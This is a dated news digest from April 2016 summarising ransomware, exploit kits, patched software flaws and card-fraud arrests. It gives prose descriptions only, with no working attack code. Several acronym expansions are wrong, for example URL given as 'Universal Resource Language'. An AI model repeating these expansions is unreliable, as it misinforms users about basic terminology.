WordPress.com pushes free HTTPS to all hosted sites. WordPress reported that it will host all free Hypertext Transfer Protocol Secure (HTTPS) traffic for all custom domains including blogs and Web sites which will ensure users are provided with only secured, HTTPS traffic. 

Malware found in IoT cameras sold by Amazon. The co-founder of Proctorio discovered that a set of security cameras sold from Amazon.com, Inc., were infected with malware after finding that an iframe, brenz_pl/rc/, was linked to a malicious Web site when connecting to a personal computer that could potentially allow attackers remote control, remote access, and to control components in a targets’ home. 

“ID Ransomware” website helps identify ransomware infections. An independent security researcher launched a new Web site named ID Ransomware that will help ransomware victims recover their encrypted files without paying the ransomware fee by allowing users to upload their encrypted files to the Web site where a thorough analysis will be conducted to notify victims which ransomware variant has locked their computers or files. Once the Web site detects the ransomware type, users will receive a link to download a decrypter to unlock encrypted files. 

Jigsaw ransomware threatens to delete your files, free decrypter available. Security researchers from @MalwareHunterTeam discovered a new ransomware dubbed Jigsaw was infecting computers with an unknown infection method and threatening victims to pay the ransomware fee by targeting 226 different file types, encrypting each file with an Advanced Encryption Standard (AES) algorithm, and adding the .fun extension at the end of each file name. Researchers advised victims to download the JigSawDecrypter to decrypt locked files. 

Google improves safe browsing for Network Admins. Google reported that it made improvements to its Safe Browsing Alerts for Network Administrators service that will inform administrators about Universal Resource Language (URL) related to malicious software, potentially unwanted programs (PUPs), and social engineering, as well as inform users about compromised pages on their networks that can allegedly harm users via drive-by downloads or exploits.

4/12/16

Petya ransomware unlocked, you can now recover password needed for decryption. Two security researchers discovered ways to help victims of the Petya ransomware retrieve locked files and unlock computers after one researcher created two Web sites where victims can obtain the decryption password, and another researcher from Emsisoft created a tool that can help generate passwords needed to unlock victims’ computers.

Nuclear exploit kit uses Tor to download payload. Researchers from Cisco discovered that the Nuclear exploit kit (EK) was dropping a Tor client file, named “tor.exe”, for Microsoft Windows to execute a request via the Tor anonymity network to download a secondary payload as several domains listed in the network traffic of the Nuclear exploit kit (EK) were never registered and were not associated with any Domain Name System (DNS) traffic. Researchers noted that as attackers used Tor to download a second payload, the malware was more difficult to track back to its hosting system.

CryptoHost ransomware locks your data in a password-protected RAR file. Security researchers from MalwareForMe, MalwareHunterTeam, Bleeping Computer, and an independent researcher discovered a way to recover RAR files locked by the CryptoHost ransomware after an analysis of the ransomware revealed it was using a combination of the users’ ID number, motherboard serial number, and the C:\ volume serial number to generate a secure hash algorithm (SHA) 1 hash, which was used to give the RAR file’s name and the file’s password. Researchers stated victims will need to open the Windows Task Manager, find the cryptohost.exe process, stop its execution, and unzip the RAR file.

Cisco releases critical security updates. Cisco released six security advisories including a high impact vulnerability in the Web application programming interface (API) of the Cisco Prime Infrastructure and Evolved Programmable Network Manager (EPNM) that could allow an attacker to send a crafted Uniform Resource Language (URL) request to bypass role-based access control (RBAC) and gain elevated privileges, as well as a vulnerability in the TelePresence Server that that could allow an attacker to cause a kernel panic and reboot the device, among other vulnerabilities.

4/11/16

Vacaville police seize 170 fake credit cards in ID theft bust. A San Francisco resident was arrested April 4 after police found 170 fraudulent cards under 7 different names, $600 in cash, and several drivers’ licenses in the suspect’s possession when he was apprehended for making more than $2,000 in fraudulent purchases at the Vacaville Premium Outlets. An investigation into the extent of the fraudulent activity is ongoing.

Florida man suspected of $200k in fraudulent purchases across U.S. arrested in Missoula. A Florida resident suspected of using counterfeit credit cards to make $200,000 worth of fraudulent purchases at stores in over 20 States was arrested in Missoula, Montana, April 4 after a loss prevention officer at the Sportsman’s Warehouse alerted police that the suspect was in the store. A search of the suspect reportedly revealed 13 credit cards and the investigation is ongoing.

22 face charges in Miami drug money-laundering ring involving ‘El Chapo’ cartel. Miami-Dade authorities announced arrest warrants April 7 for 22 people who are suspected of laundering around $1 million in illegal drug profits each month through nearly a dozen Miami businesses prior to sending the money to Colombia. The arrests are part of “Operation Neymar,” a 2-year investigation run by DHS, Miami police, and Florida State prosecutors that probes into the black market peso exchange and monitors deals in 17 countries.

Miami couple charged with $2 million identity theft fraud, authorities say. The Manhattan District Attorney’s office announced April 5 charges against a Miami couple for allegedly running a $2 million credit card fraud and identity theft scheme where the duo and co-conspirators stole personal information from over 40 victims to open credit cards, which they had shipped to locations all over the U.S. Authorities found dozens of credit cards under different names, forged identification and licenses, and a credit card encoder, among other illicit materials at multiple Miami addresses associated with the couple.

Security experts crack Dridex admin panel, recover victim data. Security researchers from buguroo reported that they were able to retrieve user data and analyze Dridex’s activity to mitigate future attacks after researchers found the Internet Protocol (IP) address of one of the Dridex admin panels, previously known as Subnet 220, hardcoded in the malicious JavaScript files. The Subnet 220 was running an older version of the Dridex backend that was previously discovered which allowed researchers to open Subnet 220’s admin panel and study its operations.

Ubuntu patches several kernel vulnerabilities. Ubuntu released patches addressing several vulnerabilities in the Linux kernel and various Ubuntu 14 and 15 variants including a use-after-free flaw that can be exploited by a local attacker to crash a system and potentially execute arbitrary code, a timing side channel vulnerability that can be exploited by an attacker to disrupt the integrity of the system, and a denial-of-service (DoS) vulnerability that could allow an unauthenticated attacker to exhaust resources and force a DoS condition, among other flaws.

Adobe patches flash zero-day exploited by Magnitude EK. Adobe released an update for its Flash Player products that patched a zero-day vulnerability, specifically a memory corruption flaw that can be exploited for remote code execution, after a security researcher from Proofpoint found changes in the Magnitude exploit kit (EK); and upon further investigation, discovered attackers were delivering various threats such as Cerber and Locky ransomware via the Magnitude EK.

Authorities shut down botnet of 4,000 Linux servers used to send spam. ESET reported that a joint effort with CyS Centrum LLC and the Cyber Police of Ukraine helped shut down the six-year-old Mumblehard botnet after researchers pinpointed the location of the true command and control (C&C) server when Mumblehard operators began making changes to their malware’s code. Authorities seized the Internet Protocol (IT) of the server and transferred it to a security firm who is running a server that is cancelling all requests made by Mumblehard’s botnets.

4/8/16 

Police: 3 people arrested for credit card scam, over 250 counterfeit credit/debit cards found. Two California men and a New Jersey woman were arrested and charged April 4 in Nashua, New Hampshire, after authorities found over 250 counterfeit credit and debit cards, more than 20 gift cards, and receipts originating from North Carolina in the trio’s vehicle. A subsequent search of the group’s two hotel rooms in Tewksbury, Massachusetts, revealed a laptop computer, a card reader and coder, a box of blank cards, and a large quantity of gift cards. 

Google reCAPTCHA cracked in new automated attack. Three security researchers developed a new automated attack that can bypass Google’s reCAPTCHA system and Facebook’s CAPTCHAS systems’ security measures and machine learning after solving the systems’ image answers security protocol with a 70.78 percent success rate when conducting studies on 2,235 CAPTCHAs. The new attack proved a higher degree of accuracy than previously reported and could potentially allow malicious hackers to conduct the same attack. 

OSVDB shut down permanently. Leaders of the Open Sourced Vulnerability Database (OSVDB) reported that its database will be shut down permanently due to the lack of support and contribution from the Information Technology (IT) industry. The project’s blog will remain active to help provide commentary on items related to the vulnerability world. 

Police raids target cyber-criminals in four countries: Germany. Approximately 700 international police officers participated in coordinated multi-national raids in the Netherlands, France, Canada, and Germany to arrest globally active hackers and a variety of Internet criminals that offered illicit services such as disguising malware from anti-virus programs to steal online passwords and banking information, among other actions. Officials reported that they arrested a chief suspect and confiscated about 300 computers and disks. 

Vulnerabilities continue to plague industrial control systems. The DHS Industrial Control Systems-Computer Emergency Readiness Team (ICS-CERT) released three security advisories on industrial control systems (ICS) that detailed vulnerabilities originally found and reported by independent researchers. The advisories indicated that critical infrastructure and industrial networks were still inundated with serious flaws. 

Hackers will break into email, social media accounts for just $129. Dell SecureWorks released a report which revealed that the underground hacker market, a virtual space for those interested in hiring a hacker to compromise a Gmail, Hotmail, or Yahoo account, only required customers to pay $129 for hacking personal email services and required customers to pay $500 to compromise corporate email accounts. In addition, the report stated the underground market offered a plethora of hacking services to buying customers including services to hack the commercial facilities sector, the transportation sector, and the financial sector, among others.

4/7/16 

Minister convicted in $5 million tax scam. A traveling minister from Arkansas was convicted April 5 for his role in a nearly $5 million fraudulent tax return scheme where he and a co-conspirator allegedly filed over 2,700 fraudulent tax returns on behalf of church members in Ohio and other States after obtaining church members’ personal information by claiming to help the members procure government stimulus funds. The minister and co-conspirator took fees from each tax refund while congregants received the balance. 

Serial ‘bandage’ bank bandit. The FBI announced a search April 5 for a bank robber dubbed the “Bandage” who robbed a Sandy Spring Bank branch in Burtonsville and a Capital One Bank branch in Elkridge April 1. Authorities stated that the man is suspected of robbing seven other banks in Maryland since October 2015. 

Windows’ Pirrit adware ported to OS X via Qt Framework. Security researcher from Cybereason discovered that the OSX/Pirrit adware was infecting Apple Mac users for the first time and hijacking users’ Web traffic with several ads via the Qt Framework, which allows programmers to write applications that work on Apple Mac devices, Linux systems, and Microsoft Window devices. The malware was seen using several steps to infiltrate a system after a user launches a Pirrit-laced binary. 

Adobe to patch actively exploited Flash zero-day. Adobe reported April 5 that it will be releasing a patch for its Flash Player 21.0.0.197 and its earlier versions April 7 which will address a zero-day vulnerability after malicious attackers were seen actively exploiting the flaws. Customers were advised to ensure their Flash Players were updated to version 21.0.0.182 or later. 

New Locky variants change communication patterns. Researchers from Check Point discovered that Locky, a prominent ransomware family, had changed its distribution mechanism to use JavaScript (.js) attachments for malware distribution and that another Locky variant was included as the malicious payload in the Nuclear exploit kit (EK) with additional communication changes. In addition, FireEye Labs researchers found that the ransomware was increasing its infection rate and surpassing the Dridex spam activities.

4/6/16 

Two former senior executives of global financial services company charged in scheme to defraud clients through secret trading commissions on billions of dollars in securities trades. Two former executives of a Boston-based financial services company were charged in an indictment unsealed April 5 for their roles in a scheme where the duo and co-conspirators allegedly added secret commissions to billions of dollars of fixed income and equity trades performed for at least six clients of the bank’s transition management business, thereby overcharging the clients by millions of dollars. The indictment also alleges that from February 2010 to September 2011 the pair took action to hide the commission from the clients and other bank employees. 

Researchers bypass patch for old IBM Java flaw. The founder and chief executive officer (CEO) of Security Explorations reported that a sandbox escape vulnerability in IBM Java, which was previously patched in 2013, could still be exploited by attackers after discovering the flaw could be abused by making minor modifications to the proof-of-concept (PoC) code published by the company in July 2013. A patch has yet to be released, but IBM was working to release a fix. 

Top Firefox extensions can hide silent malware using easy pre-fab tool. Two U.S. security researchers at the Black Hat Asia 2016 security conference reported that Mozilla’s Firefox extensions were open to attacks that can compromise machines and pass automated and human security tests by reusing attack exploit weaknesses in the structure of Firefox extensions to disguise malicious activity as legitimate functionality. 

Path traversal flaw found in ICONICS WebHMI. A German researcher discovered that ICONICS’ WebHMI product was plagued with a directory traversal flaw that could allow a remote attacker to access configuration files that stored password hashes and other information by sending a request to a vulnerable WebHMI product via the Internet. ICONICs have not released a patch and advised users to avoid exposing the product to the Internet. 

HTTP compression continues to put encrypted communications at risk. Security researchers from the National Technical University of Athens reported at the Black Hat Asia 2016 security conference that they made improvements to the Browser Reconnaissance and Exfiltration via Adaptive Compression of Hypertext (BREACH) attack to make it practical for hacking Transport Layer Security (TLS) block ciphers such as Advanced Encryption Standard (AES) by intercepting a victim’s Web traffic through a router connected to a wireless network. 

Chrome extension caught hijacking users’ browsers. Google reported that it banned the Better History Chrome extension from its Web Store after users reported that the extensions redirected them to click on a Hypertext Transfer Protocol (HTTP) link that lead to an extra Web page showing several types of advertisements. The extra Web page collected analytics on users which could be later used to sell online to advertisers. 

Google fixes another 40 security bugs in Android’s April update. Google released an Android Security Advisory patching 40 security flaws including 15 critical bugs in Android devices running versions 4.4.4 and higher, that could have allowed an attacker to root and permanently compromise the device. In addition, multiple remote code execution (RCE) flaws were patched in Dynamic Host Configuration Protocol Client Daemon (DHCPCD) service, Media Codec, Mediaserver component, and the libstagefright library, among other patched vulnerabilities. 

iOS app patching tool “rollout” prone to abuse. Security researchers from FireEye reported that another quick-patching solution, Rollout.io, used for Apple’s iOS applications and runs on 35 million devices could be abused by malicious hackers to integrate a malicious third-party ad software development kit (SDK) into a legitimate app and potentially turn harmless iOS apps into malware.

4/5/16 

Thousands of cards compromised in ATM scam. Authorities announced April 1 that a man was charged after he allegedly placed skimming devices on Wells Fargo ATMs throughout San Diego County, compromising at least 4,870 credit and debit cards with losses exceeding $428,000 through the use of counterfeit cards. The man also withdrew money from customer accounts, purchased merchandise from local Walmarts, and transmitted over $114,000 in funds via MoneyGrams to Jordan, Belgium, China, Bulgaria, and Moldova. 

Elusive Midday Bandit robs 11th bank: FBI. The FBI is searching for a man dubbed the “Midday Bandit” who is suspected of robbing the MB Financial Bank branch in Oak Lawn, Illinois, March 31. Authorities stated that the man is suspected of robbing 10 other Chicago-area banks since June 2014. 

Ex-furniture company exec pleads guilty in $18M loan fraud. The former chief financial officer (CFO) of New Jersey-based Munire Furniture Inc., and an affiliated Indiana company pleaded guilty to Federal charges April 1 after the CFO falsified the companies’ financial conditions by inflating sales and revenue numbers beginning in 2011 in order to get $17 million in loans from a Manhattan bank and $1 million in municipal loans from Gas City, Indiana, so the companies could continue business. Officials stated that the companies defaulted on the $18 million loans. 

Authentication flaw in Microsoft accounts gets researcher $13,000 reward. Microsoft patched a cross-site request forgery (CSRF) flaw in its main authentication system after a security researcher found attackers could gain access to its Azure, Outlook, and Office servers by altering the “wreply” parameter and sending authentication tokens to a hacker-controlled Web site due to improper input filtering on the “wreply” Uniform Resource Locator (URL). 

Romanian hacker “Guccifer” appears in U.S. court. A Romanian national was extradited to the U.S. for a period of 18 months after U.S. authorities stated the man allegedly hacked into the email and social media accounts of two former presidents, a former cabinet member, a former presidential advisor, and a former member of the U.S. Joint Chiefs of Staff, among other people, and released victims’ personal information including private emails, personal photographs, and medical and financial data from December 2012 – January 2014. 

Hackers can unlock any HID door controller with one UDP packet. A security researcher from Trend Micro discovered a design vulnerability in HID Global’s door controllers, specifically in VertX and Edge products, that can allow an attacker to send one malicious User Datagram Protocol (UDP) request to a door and automatically unlock the door and/or deactivate the alarm. An attacker could execute remote commands on the device with root privileges due to the two devices running a special daemon titled, discoveryd, which communicates to UDP network packets on port 4070 with information about the device.

4/4/16 

Four arrested in Calhoun County for allegedly possessing over 100 fraudulent credit cards. Authorities from the Calhoun County Sheriff’s Office in Michigan announced April 1 that 4 Chicago-area residents were arrested the week of March 28 after police found about 150 fraudulent credit cards from other countries in the group’s vehicle. Police were alerted to the suspects’ vehicle after a gas station attendant notified the police about possible credit card fraud. 

200 fake credit cards set off bomb detector at Midway, prosecutors say. Officials at Chicago Midway International Airport discovered a total of 200 fraudulent gift cards and debit cards March 29 after the magnetic strips on the cards triggered a bomb detector in airport security. Authorities stated that the fraudulent cards were found wrapped in shoes and socks. 

Code execution flaw found in Lhasa decompression library. Lhasa released version 0.3.1 for its open source tool and library product addressing an integer underflow vulnerability after Cisco TALOS researchers found hackers could exploit the flaw for arbitrary code execution by tricking victims into opening a specially crafted file, as well as through file scanning systems that leverage the vulnerable library to read the content of LZH and LHA files. 

Rokku ransomware uses QR codes to help you pay for your files. Security researchers from Avira discovered a new ransomware named Rokku that encrypts victims’ files while attaching the “.rokku” extension via spam emails embedded with malicious email attachments that will execute the ransomware’s encryption process when opened. 

SideStepper attack targets corporate iOS devices. Security researchers from Check Point discovered a new attack method dubbed SideStepper that targets Apple iOS devices used in enterprise environments and are enrolled in Mobile Device Management (MDM) setups, which could allow attackers to bypass iOS security protections and install malware on a device by sending a malicious configuration profile via email, instant messaging (IM), or short message service (SMS) to the device, through the use of a legitimate enterprise certificate to install malicious apps via a trivial Man-in-the-Middle (MitM) attack.

4/1/16 

Police bust major credit card fraud operation. Officials from the Atlanta Police Department and the U.S. Secret Service are investigating a half-million dollar credit card fraud operation after Atlanta police discovered approximately 366 fraudulent credit cards with different numbers, multiple credit card-making machines, and $330,000 worth of computers in an Atlanta apartment March 30. Officials stated the suspects allegedly purchased computers at Best Buy with the fraudulent credit cards and sold the devices internationally, and that they committed fraud using aliases at banks in the U.S., Germany, Denmark, and the Bank of China. 

California wholesale executive pleads guilty for role in $9 million bank fraud scheme. The former vice president of Eastern Tools and Equipment, Inc., in Ontario, California, pleaded guilty March 30 to Federal charges after he and co-conspirators defrauded East West Bank in Pasadena of $9 million from 2007 – 2012 by making material misrepresentations to the bank about the company’s accounts receivable and financial statements, creating shell corporations to act as suppliers and retailers doing business with Eastern Tools, and defaulting on the promissory note issued by the bank. Officials stated that the executive and his co-conspirators prolonged the scheme by opening post office boxes, phone accounts, and email accounts claiming to be associated with the shell retail companies in order to make them appear as independent entities to East West Bank. 

Malware detection bypass vulnerability found in Cisco firepower. Cisco released software updates fixing a high severity vulnerability after a researcher found that the flaw was caused by improper input validation of fields in Hypertext Transfer Protocol (HTTP) that could allow a remote, unauthenticated attacker to bypass malicious file detection and block security features by crafting an HTTP request and sending it to the victims’ system. 

Patch out for ‘ridiculous’ Trend Micro command execution vuln. Trend Micro released a patch that fixed a command execution vulnerability for systems running its Maximum Security, Premium Security or Password Management software after a security researcher from Google’s Project Zero found a remote debugging server was running on customers’ machines. Officials stated the patch was not fully complete, but will fix most critical issues with the software. 

XSS and CSRF bugs in Steam Dev panel let anyone be a Valve admin. A researcher from the United Kingdom discovered a cross-site scripting (XSS) vulnerability and a cross-site request forgery (CSRF) vulnerability affecting SteamDepot, Steam’s internal system for storing game content, after finding that a malicious JavaScript code could be added in the description field to steal users’ Steam cookies, among other actions. 

Security bug allowed attackers to send malicious emails via PayPal’s servers. PayPal Holdings, Inc., patched a flaw in one of its automatic emailing application after a security researcher from Vulnerability Lab found that attackers could add malicious code to an account’s username which were embedded in the emails sent to other recipients. The flaw could allow an attacker to execute session hijacking and redirection to external sources, and trick users into clicking a malicious link that prompts victims to enter their PayPal credentials.